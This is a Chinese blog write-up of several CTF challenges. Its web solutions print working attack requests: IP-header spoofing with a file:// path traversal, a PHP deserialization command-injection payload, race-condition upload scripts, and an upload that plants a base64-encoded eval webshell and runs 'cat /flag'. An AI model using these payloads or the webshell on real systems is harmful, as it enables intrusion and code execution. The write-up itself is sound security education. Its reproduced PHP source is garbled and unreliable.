写在前面:最近会看大佬的WP重新复现一遍题\~所以\~持续更新~

超级简陋的目录:

WEB-1 【无需复现】
WEB-2 【无需复现】
WEB-3 【无需复现】
WEB-4 【未复现】
aessss 【未复现】
rsaaaa 【未复现】
92 【2018-11-5 20:27复现更新完毕】
easy_py 【无需复现】
N0find 【未复现】
baby_arm 【未复现(还在安环境。。。)】
memo__server 【未复现】
cpp 【等待复现写详细WP】
cyvm 【未复现】
What’s_it 【未复现】

WEB-1

题目:what are you doing?

访问web1链接出现what are you doing? 常规思路看一下网站源码,发现有robots.txt

“`php+HTML
what are you doing?<br /> <!– you need to visit to robots.txt –>

<pre><code class=""><br />我们访问robots.txt发现有两个php文件

“`php+HTML
source.php
flag.php

访问flag.php是一个空白页面,访问source.php回显you need to login as admin!我们查看source.php的源码

“`php+HTML
you need to login as admin!<!– post param 'admin' –>

<pre><code class=""><br />嗯,我们需要用admin身份登陆,post过去admin=1

“`php+HTML
you need to login as admin!<!– post param ‘admin’ –>only 127.0.0.1 can get the flag!!

我们需要用127.0.0.1去访问,我们在请求头里添加x-client-ip:127.0.0.1,然后再去发包

“`php+HTML
you need to login as admin!<!– post param 'admin' –>you need post url: http://www.ichunqiu.com

<pre><code class=""><br />根据提示我们post过去下面的数据,发现会返回一个图片地址,但这个图片无法显示,我们把图片下载下来,会发现他是html,而且i春秋的主页

![mark](http://upload-images.jianshu.io/upload_images/10192446-70ec099be2086805.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

到这里其实卡了半天,在‘’url=https://www.ichunqiu.com+路径会得到该路径的网页源码,尝试拼接url然后下载flag.php的源码,但是拼接半天未果。还是队友后来想到了直接跳转目录,访问本地文件flag.php,然后把返回的该图片载下来,就是flag.php的源码,payload如下

“`http
POST /source.php HTTP/1.1
Host: a5c3e1b00225407882f0c49146799bc7264bdbab35e64bc6.game.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
x-client-ip:127.0.0.1
Referer: http://a5c3e1b00225407882f0c49146799bc7264bdbab35e64bc6.game.ichunqiu.com/source.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Connection: keep-alive
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1541299543; UM_distinctid=16554da401239b-0683daa189f84b-4c312878-144000-16554da401358; pgv_pvi=8097842176; ci_session=b34f5f4fa25e7d36b3c6f0d3efae40f090604014; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; pgv_si=s5565527040; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1541318560; Hm_lvt_9104989ce242a8e03049eaceca950328=1541299549; Hm_lpvt_9104989ce242a8e03049eaceca950328=1541299549; Hm_lvt_1a32f7c660491887db0960e9c314b022=1541299549; Hm_lpvt_1a32f7c660491887db0960e9c314b022=1541299549
Upgrade-Insecure-Requests: 1

admin=1&url=file://www.ichunqiu.com/../../var/www/html/flag.php

mark

最后拿到把图片改成php文件,拿到flag

<?php
$flag="flag{2ca93a96-39e3-48c9-9377-fd79a9f1c40b}";

web-2

题目:Can you hack me?

这个题是个.swp的文件泄露,我们把.swp文件下载下来进行源码审计

mark

.swp文件需要在linux下用vi -r index.php.swp来恢复文件

然后开始代码审计········

“`php+HTML
<?php
error_reporting(0);
class come{
private method;
private
args;
function __construct(method,args) {
this->method =method;
this->args =args;
}
function __wakeup(){
foreach(this->args ask => v) {this->args[k] =this->waf(trim(v));
}
}
function waf(
str){
str=preg_replace("/[<>*;|?\n ]/","",str);
str=str_replace('flag','',str);
return str;
}
function echo(
host){
system("echo host");
}
function __destruct(){
if (in_array(
this->method, array("echo"))) {
call_user_func_array(array(this,this->method), this->args);
}
}

}first='hi';
var='var';bbb='bbb';
ccc='ccc';i=1;
foreach(_GET askey => value) {
if(
i===1)
{
i++;key =value;
}
else{break;}
}
if(first==="doller")
{
@parse_str(
_GET['a']);
if(var==="give")
{
if(
bbb==="me")
{
if(ccc==="flag")
{
echo "<br>welcome!<br>";
come=@_POST['come'];
unserialize(
come);
}
}
else
{echo "<br>think about it<br>";}
}
else
{
echo "NO";
}

}
else
{
echo "Can you hack me?<br>";
}
?>

<pre><code class=""><br />通过分析代码我们可以知道要先get参数绕过然后执行反序列化,get参数绕过如下

</code></pre>

?first=doller&a=var%3dgive%26bbb%3dme%26ccc%3dflag

<pre><code class=""><br />然后开始思考绕过反序列化,根据题目代码得知,__wakeup方法执行了一个过滤字符的waf。所以需要利用谷歌发现的CVE-2016-7124漏洞,当序列化的字符串中,如果表示对象属性的个数的值大于真实的属性个数就会跳过wakeup的执行。 可是发现本地测试可以通过,远程却不可以。。。。难受了,开始代码审计,发现没有过滤斜杠,而空格可以使用IFS绕过,同时通过学习参考链接:

https://www.knowsec.net/archives/341/

https://blog.csdn.net/qq_42196196/article/details/81217375?utm_source=blogkpcl1

于是payload:

</code></pre>

POST /?first=doller&a=var%3dgive%26bbb%3dme%26ccc%3dflag HTTP/1.1
Host: f927629d24dd4e0b84ef5e917d89dba041b03b9deb3641d9.game.ichunqiu.com
Accept-Encoding: gzip, deflate
Accept: <em>/</em>
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 127

come=O:4:"come":2:{s:12:"%00come%00method";s:4:"echo";s:10:"%00come%00args";a:2:{i:0;s:18:"<code>catIFS/flflagag</code>";i:1;s:3:"hjj";}}

<pre><code class=""><br /><br /><br /># web-3

打开题目,直接给了源码。

竞争上传shell

poc1

“`python
import threading

import requests

def send(num):

url=”http://1f59ccd88b9d491db1b14abc6ff8642bbb50265d149e41f1.game.ichunqiu.com/”

# url=”http://web3.shb.5am3″

file_name = “file”

file_upload_name = “5am3.php”

f= open(“5am3.php”,”r”)

data={

“file[1]”:”aaa”,

“file[]”:”php”,

“hehe”:”http://test2.5am3.com/test.php”

}

file={

file_name: (file_upload_name, f),

}

# print(“2”)

try:

req=requests.post(url, data, files=file)

# print(req.text)

if(“@” in req.text):

print(“crack ok!”)

except Exception as e:

print “1”

def crack(threadNumber=5):

threads=[]

for num in range(120,121):

threads.append(threading.Thread(target=send,args=(num,)))

for thread in threads:

thread.start()

while True:

if (len(threading.enumerate()) < threadNumber):

break

while(1):

crack()

# send(111)

poc2

import threading

import requests

def send(num):

    url="http://1f59ccd88b9d491db1b14abc6ff8642bbb50265d149e41f1.game.ichunqiu.com/"

    # url="http://web3.shb.5am3"

    file_name = "file"

    file_upload_name = "5am3.php"

    f= open("5am32.php","r")

    data={

        "file[1]":"aaa",

        "file[]":"php",

        "hehe":str(num)+".php"

    }

    file={

        file_name: (file_upload_name, f),

    }

    # print("2")

    try:

        req=requests.post(url, data, files=file)

        # print(req.text)

        if("@" in req.text):

            print("crack ok!")

    except Exception as e:

        print "1"

def crack(threadNumber=20):

    threads=[]

    for num in range(100,900):

        threads.append(threading.Thread(target=send,args=(num,)))

    for thread in threads:

        thread.start()

        while True:

            if (len(threading.enumerate()) < threadNumber):

                break

while(1):

    crack()

# send(111)

payload :

POST / HTTP/1.1
Host: 1f59ccd88b9d491db1b14abc6ff8642bbb50265d149e41f1.game.ichunqiu.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://web3.shb.5am3/
Content-Type: multipart/form-data; boundary=---------------------------21022237801674110016436295918
Content-Length: 1107
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="file"; filename="5am3.php"
Content-Type: text/php

@<?php 
$file = 'config.php';
$code = base64_decode('QDw/cGhwCiAgICBpZihtZDUoJF9QT1NUWydwYXNzJ10pPT0iNGViZDM5N2QzZWU2NmMyMTBlM2RjNWYzYWNmOGQ5YzMiKSBldmFsKCRfUE9TVFsna24wY2snXSk7Cj8+CiAgICAgICAgICAgIAogICAg');
file_put_contents($file, $code);
?>
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="file[1]"

sssss.asd
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="file[]"

php
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="hehe"

/var/sandbox/2765d621af8a58b78b4d528bd5ef7f6b/config.php
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="pass"

5am3
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="kn0ck"

system("cat /flag");
-----------------------------21022237801674110016436295918--

MISC-easy py

可以通过010 editor来分析pyc文件结构,然后让其生成CSV文件,简单排版后根据010自动检测出的变量列表填入Value,并推测其实际的python代码。并且推测程序加密逻辑,进而写出解密程序。

mark

mark

int cmp[15]={};
int q=0;
for(int i=0;i<15;i++)
{
    for(int j=0;j<255;j++)
    {
        if(cmp[q] == ((~j)&102)|(j&(-103)))
        {
            q=q+1;
            cout<<(char)j;
            break;      
        }
    }
}


可以写出解密脚本

cpp

根据逆向发现flag经过两层加密,因为运算量较小,可直接通过爆破法直接求解

[图片上传失败…(image-40ab3e-1541408536205)]

最终 flag{W0w_y0u_m4st3r_C_p1us_p1us}

92

打开文件发现这么一大堆字符

mark

拖到底发现

mark

发现D0CF11E0(DOC文件头),那么推测需要行置换,利用EXCEL。

(首先修改单元格格式为数值型,紧接着在A列插入序号(强烈建议使用自动填充),然后排序,再复制回来)

mark

复制进HxD,存为doc文件,打开发现需要密码!

mark

mark

接着又发现第一行最后几位是倒序的PNG文件头(74E40598)

mark

写脚本倒序

file_read = open("/home/xiaolan/Desktop/get.txt", 'r+')
file_wtite = open("/home/xiaolan/Desktop/out.txt", 'a+')
for i in range(229893):
    str_1=file_read.readline(32)
    file_wtite.writelines(str_1[::-1])
file_read.close()
file_wtite.close()

得到PNG文件

mark

mark

扫描后得到>:2?kEaX

mark

解码得到doc的密码Passwd

mark

打开文档发现

mark

再次扫喵

[图片上传失败…(image-163b9f-1541420455499)]

得到flag{XXXX+XXXX+stlganography}

挪开二维码发现

mark

mark

得到flag{M1sc_+XXXX+stlganography}

然后解密图片

mark

得到了flag为

flag{M1sc_Off1c1_stlganography}

分类: CTF

0 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注